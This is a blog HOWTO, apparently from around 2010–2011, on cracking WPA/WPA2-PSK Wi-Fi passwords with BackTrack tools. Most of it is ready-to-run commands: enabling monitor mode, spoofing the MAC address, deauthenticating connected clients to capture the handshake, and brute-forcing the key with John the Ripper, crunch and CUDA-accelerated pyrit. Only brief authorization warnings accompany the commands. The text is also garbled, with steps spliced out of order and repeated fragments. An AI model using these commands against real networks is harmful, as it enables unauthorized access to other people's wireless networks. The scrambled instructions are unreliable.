Friday, April 16, 2010HOWTO : Crack WPA/WPA2-PSK with John the Ripper At the moment, we need to use dictionaries to brute force the WPA/WPA-PSK. To crack WPA/WPA2-PSK requires the to be cracked key is in your dictionaries. I have a better solution to crack WPA/WPA2-PSK (in theory, it must success) but it requires hours to years to crack depending on the strength of the key and the speed of the hardwares. The following tutorial is based on Back|Track 4. Suppose the wifi channel is 5, the BSSID MAC is 00:24:B2:A0:51:14 and the client MAC is 00:14:17:94:90:0D. Make sure the client is connecting to the wifi router when you are performing Step 1 to 4. Step 1 : airmon-ng start wlan0 Step 2 : airodump-ng mon0 Step 3 : airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0 Step 4 : aireplay-ng --deauth 10 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0 To get the handshake when done and then go to next step. If not, do it again until you get the handshake. Step 5 : /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:24:B2:A0:51:14 -w - output*.cap You are required to wait for hours or years for the cracking which is depends on how powerful your hardwares are and strength of the key. CUDA will make the work more easier but it may also need years or so just depends. WARNING : Do NOT crack any wifi router without authorization or you will be put into jail. Step 6 : . press "Ctrl+c" to break the program. you will be put into the jail.[phy0] Step 2 : airmon-ng start wlan0 Step 3 (Optional) : Change the mac address of the mon0 interface.HOWTO : WPA/WPA2 cracking with Back|Track 5 Don't crack any wifi router without authorization. otherwise. (A) General Display card Step 1 : airmon-ng The result will be something like : Interface wlan0 Chipset Intel 5100 Driver iwlagn . ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up Step 4 : airodump-ng mon0 Then. Step 5 : airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0 *where -c is the channel -w is the file to be written --bssid is the BSSID This terminal is keeping running. tgz/download tar -xvzf crunch-3.lst wpacrack-01. Step 7 : Use the John the Ripper as word list to crack the WPA/WP2 password.0 make make install /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.net/projects/crunch-wordlist/files/crunchwordlist/crunch-3. you can use pyrit to crack the password with crunch.open another terminal.ivs -b ff:ff:ff:ff:ff:ff -w - *where 8 16 is the length of the password. aircrack-ng -w /pentest/passwords/john/password. aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0 *where -a is the BSSID -c is the client MAC address (STATION) Wait for the handshake. Go to the official site of crunch. i. you can use Crunch.net/projects/crunch-wordlist/files/crunch-wordlist/ Download crunch 3. (B) nVidia Display Card with CUDA If you have nVidia card that with CUDA.ivs Step 8 (Optional) : If you do not want to use John the Ripper as word list. from 8 characters to 16 characters.0.0.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.0 (the current version at the time of this writing). Step a : airmon-ng The result will be something like : . http://sourceforge.tgz cd crunch-3.e. http://sourceforge. apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy Step h : Go to the official site of crunch. press "Ctrl+c" to break the program. Step g : If the following programs are not yet installed. http://sourceforge. Step e : airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0 Step f : open another terminal.Interface wlan0 Chipset Intel 5100 Driver iwlagn . ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up Step d : airodump-ng mon0 Then.net/projects/crunch-wordlist/files/crunch-wordlist/ . please do it.[phy0] Step b : airmon-ng start wlan0 Step c (Optional) : Change the mac address of the mon0 interface. aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0 *where -a is the BSSID -c is the client MAC address (STATION) Wait for the handshake. from 8 characters to 16 characters.cap -b ff:ff:ff:ff:ff:ff -i attack_passthrough *where 8 16 is the length of the password.0 python setup.0 python setup.4.gz cd cpyrit-cuda-0.cap -b ff:ff:ff:ff:ff:ff -i attack_passthrough *where 8 16 is the length of the password.google.cap -o new.gz cd pyrit-0.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.4. pyrit -r wpacrack-01. http://code.Download crunch 3.0.cap stripLive /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.0 at the time of this writing). .tar.0. from 8 characters to 16 characters.4. you should do the following step.tgz cd crunch-3.0 make make install Step i : Go to the official site of pyrit. i. i.cap.tgz/download tar -xvzf crunch-3.py install Step j : /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.0 (the current version at the time of this writing). tar -xzvf pyrit-0.e. Step k (Optional) : If you encounter error when reading the wpacrack-01.4.e.net/projects/crunch-wordlist/files/crunchwordlist/crunch-3.py build sudo python setup.com/p/pyrit/downloads/list Download pyrit and cpyrit-cuda (the current version is 0.tar.py install tar -xzvf cpyrit-cuda-0.py build sudo python setup.0. http://sourceforge.0.4. 4. 17504 PMKs per second.11-packets).0 (C) 2008-2011 Lukas Lueg http://pyrit. Posted by Samiux at 08:57 Labels: Back|Track. aireplay-ng -9 mon0 Make sure pyrit workable on your system : pyrit list_cores That's all! See you.Step l : Then.. got 55 AP(s) Tried 17960898 PMKs so far. crunch. WPA2 . Remarks : If you have an nVidia GeForce GTX460 (336 CUDA cores).googlecode.cap' (1/1). pyrit. Parsed 71 packets (71 802. Pyrit 0. CUDA. the speed of cracking is about 17.000 passwords per second.. you will see something similar to the following. To test if your wireless card (either USB or PCI-e) can do the injection or not : airodump-ng mon0 Open another terminal.com This code is distributed under the GNU General Public License v3+ Parsing file 'new. John the Ripper. WPA.